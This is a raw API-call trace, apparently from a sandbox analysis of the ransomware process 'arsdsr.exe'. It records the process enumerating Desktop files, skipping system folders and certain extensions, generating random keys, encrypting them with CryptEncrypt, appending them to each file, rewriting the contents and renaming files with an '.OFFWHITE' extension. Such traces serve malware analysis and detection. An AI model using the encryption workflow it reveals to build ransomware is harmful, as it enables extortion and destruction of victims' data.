dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.380] WriteFile (in: hFile=0x21c, lpBuffer=0x53f4b8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f4b8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.381] GetProcessHeap () returned 0x500000 [0132.381] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x87db) returned 0x5587b8 [0132.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.381] ReadFile (in: hFile=0x21c, lpBuffer=0x5587b8, nNumberOfBytesToRead=0x87db, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesRead=0x295dec0*=0x87db, lpOverlapped=0x0) returned 1 [0132.384] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.384] WriteFile (in: hFile=0x21c, lpBuffer=0x5587b8*, nNumberOfBytesToWrite=0x87db, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesWritten=0x295decc*=0x87db, lpOverlapped=0x0) returned 1 [0132.384] GetProcessHeap () returned 0x500000 [0132.384] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5587b8 | out: hHeap=0x500000) returned 1 [0132.384] CloseHandle (hObject=0x21c) returned 1 [0132.385] GetProcessHeap () returned 0x500000 [0132.385] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.386] GetProcessHeap () returned 0x500000 [0132.386] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.386] GetProcessHeap () returned 0x500000 [0132.386] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.386] GetProcessHeap () returned 0x500000 [0132.386] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.386] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf" [0132.386] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf.OFFWHITE" [0132.386] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\b2jtlk76bx.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\b2jtLK76Bx.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\b2jtlk76bx.swf.offwhite")) returned 1 [0132.390] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1bcc850, ftCreationTime.dwHighDateTime=0x1d5e824, ftLastAccessTime.dwLowDateTime=0xc340f710, ftLastAccessTime.dwHighDateTime=0x1d5deb1, ftLastWriteTime.dwLowDateTime=0xc340f710, ftLastWriteTime.dwHighDateTime=0x1d5deb1, nFileSizeHigh=0x0, nFileSizeLow=0xacfc, dwReserved0=0x295debc, dwReserved1=0x4c0a66fd, cFileName="C8NwK7kicdF_gX.mp3", cAlternateFileName="C8NWK7~1.MP3")) returned 1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2=".") returned 1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="..") returned 1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="...") returned 1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="windows") returned -1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="$recycle.bin") returned 1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="rsa") returned -1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="ntuser.dat") returned -1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="programdata") returned -1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="appdata") returned 1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="program files") returned -1 [0132.390] lstrcmpiW (lpString1="C8NwK7kicdF_gX.mp3", lpString2="program files (x86)") returned -1 [0132.390] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" [0132.390] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\", lpString2="C8NwK7kicdF_gX.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\C8NwK7kicdF_gX.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\C8NwK7kicdF_gX.mp3" [0132.390] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.390] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.390] PathFindExtensionW (pszPath="C8NwK7kicdF_gX.mp3") returned=".mp3" [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0132.391] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0132.391] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06a6830, ftCreationTime.dwHighDateTime=0x1d5e154, ftLastAccessTime.dwLowDateTime=0x59ba1190, ftLastAccessTime.dwHighDateTime=0x1d5de3f, ftLastWriteTime.dwLowDateTime=0x59ba1190, ftLastWriteTime.dwHighDateTime=0x1d5de3f, nFileSizeHigh=0x0, nFileSizeLow=0x13154, dwReserved0=0x295debc, dwReserved1=0x4c0a66fd, cFileName="Nto _6ZYl5a3vgqpp.doc", cAlternateFileName="NTO_6Z~1.DOC")) returned 1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2=".") returned 1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="..") returned 1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="...") returned 1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="windows") returned -1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="$recycle.bin") returned 1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="rsa") returned -1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="ntuser.dat") returned -1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="programdata") returned -1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="appdata") returned 1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="program files") returned -1 [0132.391] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="program files (x86)") returned -1 [0132.391] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" [0132.392] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\", lpString2="Nto _6ZYl5a3vgqpp.doc" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc" [0132.392] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.392] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.392] PathFindExtensionW (pszPath="Nto _6ZYl5a3vgqpp.doc") returned=".doc" [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".com") returned 1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".cpl") returned 1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".url") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".mp3") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".pif") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".mp4") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".OFFWHITE") returned -1 [0132.392] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0132.392] lstrcmpiW (lpString1="Nto _6ZYl5a3vgqpp.doc", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.392] GetProcessHeap () returned 0x500000 [0132.392] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f4c8 [0132.392] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\nto _6zyl5a3vgqpp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.393] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=78164) returned 1 [0132.393] GetProcessHeap () returned 0x500000 [0132.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.393] GetProcessHeap () returned 0x500000 [0132.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.393] GetProcessHeap () returned 0x500000 [0132.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.393] GetProcessHeap () returned 0x500000 [0132.393] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.393] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.393] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.393] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.393] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.393] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.393] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.393] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.393] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.394] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.394] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.394] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.394] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.394] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x13154, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.394] SetLastError (dwErrCode=0x0) [0132.394] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.398] GetLastError () returned 0x0 [0132.398] GetLastError () returned 0x0 [0132.398] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x13254, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.398] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.398] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x13354, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.398] WriteFile (in: hFile=0x21c, lpBuffer=0x53f4c8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f4c8*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.398] GetProcessHeap () returned 0x500000 [0132.398] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x13154) returned 0x5587b8 [0132.398] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.398] ReadFile (in: hFile=0x21c, lpBuffer=0x5587b8, nNumberOfBytesToRead=0x13154, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesRead=0x295dec0*=0x13154, lpOverlapped=0x0) returned 1 [0132.404] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.404] WriteFile (in: hFile=0x21c, lpBuffer=0x5587b8*, nNumberOfBytesToWrite=0x13154, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5587b8*, lpNumberOfBytesWritten=0x295decc*=0x13154, lpOverlapped=0x0) returned 1 [0132.405] GetProcessHeap () returned 0x500000 [0132.405] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5587b8 | out: hHeap=0x500000) returned 1 [0132.405] CloseHandle (hObject=0x21c) returned 1 [0132.407] GetProcessHeap () returned 0x500000 [0132.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.407] GetProcessHeap () returned 0x500000 [0132.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.407] GetProcessHeap () returned 0x500000 [0132.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.407] GetProcessHeap () returned 0x500000 [0132.407] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.407] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc" [0132.407] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc.OFFWHITE" [0132.407] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\nto _6zyl5a3vgqpp.doc"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\Nto _6ZYl5a3vgqpp.doc.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\plgxx-\\nto _6zyl5a3vgqpp.doc.offwhite")) returned 1 [0132.408] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe06a6830, ftCreationTime.dwHighDateTime=0x1d5e154, ftLastAccessTime.dwLowDateTime=0x59ba1190, ftLastAccessTime.dwHighDateTime=0x1d5de3f, ftLastWriteTime.dwLowDateTime=0x59ba1190, ftLastWriteTime.dwHighDateTime=0x1d5de3f, nFileSizeHigh=0x0, nFileSizeLow=0x13154, dwReserved0=0x295debc, dwReserved1=0x4c0a66fd, cFileName="Nto _6ZYl5a3vgqpp.doc", cAlternateFileName="NTO_6Z~1.DOC")) returned 0 [0132.408] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0132.408] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12e9e010, ftCreationTime.dwHighDateTime=0x1d5ddf9, ftLastAccessTime.dwLowDateTime=0x5865a30, ftLastAccessTime.dwHighDateTime=0x1d5da1f, ftLastWriteTime.dwLowDateTime=0x5865a30, ftLastWriteTime.dwHighDateTime=0x1d5da1f, nFileSizeHigh=0x0, nFileSizeLow=0x6a18, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="qk5UTmohXRBUkoH9DH.docx", cAlternateFileName="QK5UTM~1.DOC")) returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2=".") returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="..") returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="...") returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="windows") returned -1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="$recycle.bin") returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="rsa") returned -1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="ntuser.dat") returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="programdata") returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="appdata") returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="program files") returned 1 [0132.409] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="program files (x86)") returned 1 [0132.409] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.409] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="qk5UTmohXRBUkoH9DH.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx" [0132.409] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.409] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.409] PathFindExtensionW (pszPath="qk5UTmohXRBUkoH9DH.docx") returned=".docx" [0132.409] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0132.409] lstrcmpiW (lpString1=".docx", lpString2=".log") returned -1 [0132.409] lstrcmpiW (lpString1=".docx", lpString2=".cab") returned 1 [0132.409] lstrcmpiW (lpString1=".docx", lpString2=".cmd") returned 1 [0132.409] lstrcmpiW (lpString1=".docx", lpString2=".com") returned 1 [0132.409] lstrcmpiW (lpString1=".docx", lpString2=".cpl") returned 1 [0132.409] lstrcmpiW (lpString1=".docx", lpString2=".ini") returned -1 [0132.409] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0132.410] lstrcmpiW (lpString1=".docx", lpString2=".url") returned -1 [0132.410] lstrcmpiW (lpString1=".docx", lpString2=".ttf") returned -1 [0132.410] lstrcmpiW (lpString1=".docx", lpString2=".mp3") returned -1 [0132.410] lstrcmpiW (lpString1=".docx", lpString2=".pif") returned -1 [0132.410] lstrcmpiW (lpString1=".docx", lpString2=".mp4") returned -1 [0132.410] lstrcmpiW (lpString1=".docx", lpString2=".OFFWHITE") returned -1 [0132.410] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0132.410] lstrcmpiW (lpString1="qk5UTmohXRBUkoH9DH.docx", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.410] GetProcessHeap () returned 0x500000 [0132.410] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f4d8 [0132.410] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qk5utmohxrbukoh9dh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.410] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=27160) returned 1 [0132.410] GetProcessHeap () returned 0x500000 [0132.411] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.411] GetProcessHeap () returned 0x500000 [0132.411] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.411] GetProcessHeap () returned 0x500000 [0132.411] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.411] GetProcessHeap () returned 0x500000 [0132.411] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.411] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.411] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.411] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.411] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.411] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.411] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.411] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.411] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.411] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.412] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.412] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.412] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.412] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6a18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.412] SetLastError (dwErrCode=0x0) [0132.412] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.414] GetLastError () returned 0x0 [0132.414] GetLastError () returned 0x0 [0132.414] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6b18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.414] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.414] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6c18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.414] WriteFile (in: hFile=0xb0, lpBuffer=0x53f4d8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f4d8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.414] GetProcessHeap () returned 0x500000 [0132.414] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6a18) returned 0x5577b0 [0132.414] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.415] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x6a18, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x6a18, lpOverlapped=0x0) returned 1 